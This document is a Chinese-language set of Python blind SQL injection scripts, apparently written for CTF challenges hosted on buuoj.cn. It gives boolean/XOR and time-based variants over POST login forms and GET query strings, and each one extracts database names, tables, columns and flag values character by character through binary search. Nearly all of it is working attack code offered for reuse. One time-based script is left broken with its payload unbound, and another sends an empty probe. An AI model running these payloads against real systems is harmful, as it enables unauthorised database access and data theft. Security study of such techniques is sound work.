1.通过post传参的脚本
使用时修改 post 参数的名字和个数
1.1 基于异或盲注,布尔盲注等:
import requests

# Target and oracle string are those of the original listing.
url = 'http://736aa374-b497-441f-9b6a-a1c91f9b182b.node4.buuoj.cn:81/login.php'

# Boolean-based blind extraction: each character of the value is recovered
# with a binary search over ASCII 32..127, one POST per comparison.  The
# marker 'u6216' appearing in the response body is the "true" branch of the
# oracle.  From the server side this is a burst of near-identical login
# requests whose "name" field differs only in two integers; parameterised
# queries remove the oracle the loop depends on.
flag = ''
for pos in range(1, 1000):
    lo, hi = 32, 127
    mid = (lo + hi) // 2
    while hi > lo:
        # Only the data probe is active; the source listing kept alternates
        # for other objects as commented-out lines.
        probe = f"1' or ascii(substr((seleCt(flag)from(fl4g)),{pos},1))>{mid}#"
        reply = requests.post(url, data={"name": probe, "pass": 'qwer'})
        if 'u6216' in reply.text:
            lo = mid + 1
        else:
            hi = mid
        mid = (lo + hi) // 2
    # lo == 32 means no printable character matched: end of the value.
    if lo == 32:
        break
    flag += chr(lo)
print(flag)
1.2 基于时间盲注:
import requests
import time

# Time-based variant of the POST script above: the oracle is response
# latency instead of response content.
url = 'http://736aa374-b497-441f-9b6a-a1c91f9b182b.node4.buuoj.cn:81/login.php'
flag = ''
for i in range(1,1000):
    # Binary search over ASCII 32..127 for the i-th character.
    high = 127
    low = 32
    mid = (low + high) // 2
    while high > low:
        # NOTE(review): every candidate probe below is commented out, so
        # `payload` is never bound and the first `data = {...}` raises
        # NameError.  Left exactly as in the original listing; the author
        # un-comments one line before use.
        #payload = f"1' or if(ascii(substr(database(),{i},1))>{mid},sleep(2),1)#" # database name
        #payload=f"1'or if(ascii(substr((seleCt(group_concat(table_name))from(information_schema.tables)where(table_schema)='note'),{i},1))>{mid},sleep(2),1)#" # table names
        #payload=f"1'or if(ascii(substr((seleCt(group_concat(column_name))from(information_schema.columns)where(table_name)='users'),{i},1))>{mid},sleep(2),1)#" # column names
        #payload = f"1'or if(ascii(substr((seleCt(flag)from(fl4g)),{i},1))>{mid},sleep(2),1)#" # data
        data = {
            "name": payload,
            "pass": 'qwer'
        }
        # Timestamps are truncated to whole seconds, so the `> 1` threshold is
        # coarse: a reply that straddles a second boundary can be misread.
        last = int(time.time())
        response = requests.post(url, data = data)
        now = int(time.time())
        if now - last > 1 :
            low = mid + 1
        else :
            high = mid
        mid = (low + high) // 2
    # low == 32 means no printable character matched: end of the value.
    if low != 32 :
        flag += chr(int(low))
    else:
        break
print(flag)
2.通过get传参的脚本
使用时修改 url 和判断用的文本
2.1 基于异或盲注,布尔盲注等:
import requests

url = "http://d98fb290-369c-4ad8-8cd5-883846041dad.node4.buuoj.cn/search.php?id="

# Same binary search as the POST variant, but the probe rides in the GET
# query string (appended raw, not URL-encoded) and the oracle is the literal
# 'ERROR' in the response body.  The active probe targets the database
# name; the source listing kept alternates for other objects as
# commented-out lines.
name = ''
for pos in range(1, 1000):
    lo, hi = 32, 128
    while lo < hi:
        mid = (lo + hi) // 2
        probe = f"1^(ascii(substr(database(),{pos},1))>{mid})#"
        reply = requests.get(url=url + probe)
        if 'ERROR' in reply.text:
            lo = mid + 1
        else:
            hi = mid
    # lo == 32 means no printable character matched: end of the value.
    if lo == 32:
        break
    name += chr(lo)
print(name)
2.2 基于时间盲注:
import requests
import time

url = "http://d98fb290-369c-4ad8-8cd5-883846041dad.node4.buuoj.cn/search.php?id="


def _extract_by_timing(prefix: str) -> str:
    """Run the time-based search once and return *prefix* plus what it recovers.

    The oracle is wall-clock latency: a reply that takes more than one whole
    second (timestamps are truncated to integer seconds, so this is coarse)
    counts as "true".  The probe is a blank template in the original
    listing, so as written every request carries a single space and the
    loop only measures the server's baseline latency.
    """
    recovered = prefix
    for _pos in range(1, 1000):
        lo, hi = 32, 128
        while lo < hi:
            mid = (lo + hi) // 2
            probe = " "  # template left empty in the source listing
            started = int(time.time())
            requests.get(url=url + probe)
            finished = int(time.time())
            if finished - started > 1:
                lo = mid + 1
            else:
                hi = mid
        # lo == 32 means no character was selected: stop.
        if lo == 32:
            break
        recovered += chr(lo)
    return recovered


name = ''
# The original listing repeats the whole loop a second time, continuing from
# the first run's result; both runs are kept so the output is unchanged.
name = _extract_by_timing(name)
print(name)
name = _extract_by_timing(name)
print(name)